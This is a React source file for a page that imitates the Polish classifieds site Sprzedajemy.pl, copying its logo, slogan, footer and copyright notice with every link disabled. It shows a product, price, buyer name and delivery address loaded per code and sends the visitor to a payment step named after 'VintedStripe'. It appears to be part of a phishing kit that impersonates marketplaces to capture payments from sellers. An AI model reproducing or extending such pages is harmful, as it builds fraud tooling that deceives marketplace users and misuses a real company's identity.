import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './SprzedajemyPlSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/sprzedajemy-pl-logo.jpg`;

const FOOT_ROW1 = ['O nas', 'Bezpieczeństwo', 'Pomoc', 'Poradnik kupującego', 'Mapa kategorii', 'Ogłoszenia archiwalne'];
const FOOT_ROW2 = ['Aplikacja mobilna', 'Media', 'Reklama', 'Kariera', 'Kontakt'];

function noop(e) {
  e.preventDefault();
}

function IconUser() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" aria-hidden>
      <circle cx="12" cy="9" r="3.5" stroke="currentColor" strokeWidth="1.6" />
      <path d="M6 20c0-3.5 3-6 6-6s6 2.5 6 6" stroke="currentColor" strokeWidth="1.6" strokeLinecap="round" />
    </svg>
  );
}

/**
 * Sprzedajemy.pl — podsumowanie / dostawa; Dalej → index2 (VintedStripe2).
 */
function SprzedajemyPlSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'PL').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'PLN';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceStr = useMemo(() => {
    if (priceNumber == null) return '—';
    return new Intl.NumberFormat('pl-PL', {
      minimumFractionDigits: 0,
      maximumFractionDigits: 2,
    }).format(priceNumber);
  }, [priceNumber]);

  const productName = (pageData?.product_name || '').trim() || '—';
  const fullName = [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const photoUrl = (pageData?.photo_url || '').trim();
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const amountLine = priceStr === '—' ? '—' : `${priceStr} ${sym}`;

  if (loading && pageCode) {
    return (
      <div className="sprpl-wrap" lang="pl">
        <div className="sprpl-loading">Ładowanie…</div>
        <div className="sprpl-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="sprpl-wrap" lang="pl">
      <header className="sprpl-header">
        <div className="sprpl-header-inner">
          <a href="#/" className="sprpl-brand" onClick={noop} aria-label="Sprzedajemy.pl">
            <img src={LOGO_SRC} alt="" className="sprpl-logo" width={210} height={34} />
            <p className="sprpl-slogan">Wszystko kupisz. Wszystko sprzedasz.</p>
          </a>
          <div className="sprpl-header-actions">
            <a href="#/" className="sprpl-user-ic" onClick={noop} aria-label="Konto">
              <IconUser />
            </a>
            <a href="#/" className="sprpl-btn-add" onClick={noop}>
              + Dodaj ogłoszenie
            </a>
          </div>
        </div>
      </header>

      <div className="sprpl-main">
        <div className="sprpl-grid">
          <div>
            <h1 className="sprpl-title">{productName}</h1>
            <div className={`sprpl-img-wrap${photoUrl ? '' : ' sprpl-img--ph'}`}>
              {photoUrl ? <img src={photoUrl} alt="" className="sprpl-img" /> : null}
              <button type="button" className="sprpl-img-close" onClick={noop} aria-label="Zamknij">
                ×
              </button>
            </div>
          </div>

          <aside className="sprpl-side">
            <div className="sprpl-price-box">
              <p className="sprpl-price">{amountLine}</p>
            </div>
            <div className="sprpl-form-block">
              <h2>Informacje o dostawie</h2>
              <div className="sprpl-field">
                <label htmlFor="sprpl-name-display">Pełne imię i nazwisko</label>
                <div id="sprpl-name-display" className="sprpl-input-like">
                  {fullName}
                </div>
              </div>
              <div className="sprpl-field">
                <label htmlFor="sprpl-addr-display">Adres dostawy</label>
                <div id="sprpl-addr-display" className="sprpl-input-like">
                  {address}
                </div>
              </div>
              <Link to={index2Path} className="sprpl-cta">
                Dalej
              </Link>
            </div>
          </aside>
        </div>
      </div>

      <footer className="sprpl-footer">
        <div className="sprpl-footer-inner">
          <div className="sprpl-foot-row">
            {FOOT_ROW1.map((t) => (
              <a key={t} href="#/" onClick={noop}>
                {t}
              </a>
            ))}
          </div>
          <div className="sprpl-foot-row">
            {FOOT_ROW2.map((t) => (
              <a key={t} href="#/" onClick={noop}>
                {t}
              </a>
            ))}
          </div>
          <p className="sprpl-foot-offer">
            Oferta dla firm: Motoryzacja, Nieruchomości, Praca, Usługi, Sklep internetowy
          </p>
          <div className="sprpl-foot-badges">
            <a href="#/" className="sprpl-badge" onClick={noop}>
              POBIERZ Z Google Play
            </a>
            <a href="#/" className="sprpl-badge" onClick={noop}>
              Pobierz w App Store
            </a>
          </div>
          <p className="sprpl-copy">
            Copyright © 2011–{new Date().getFullYear()} Sprzedajemy.pl Sp. z o.o. Korzystanie z serwisu oznacza akceptację regulaminu.
          </p>
          <div className="sprpl-legal">
            <a href="#/" onClick={noop}>
              Polityka prywatności
            </a>
            <a href="#/" onClick={noop}>
              Polityka cookies
            </a>
          </div>
        </div>
      </footer>

      <div className="sprpl-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default SprzedajemyPlSuccess;
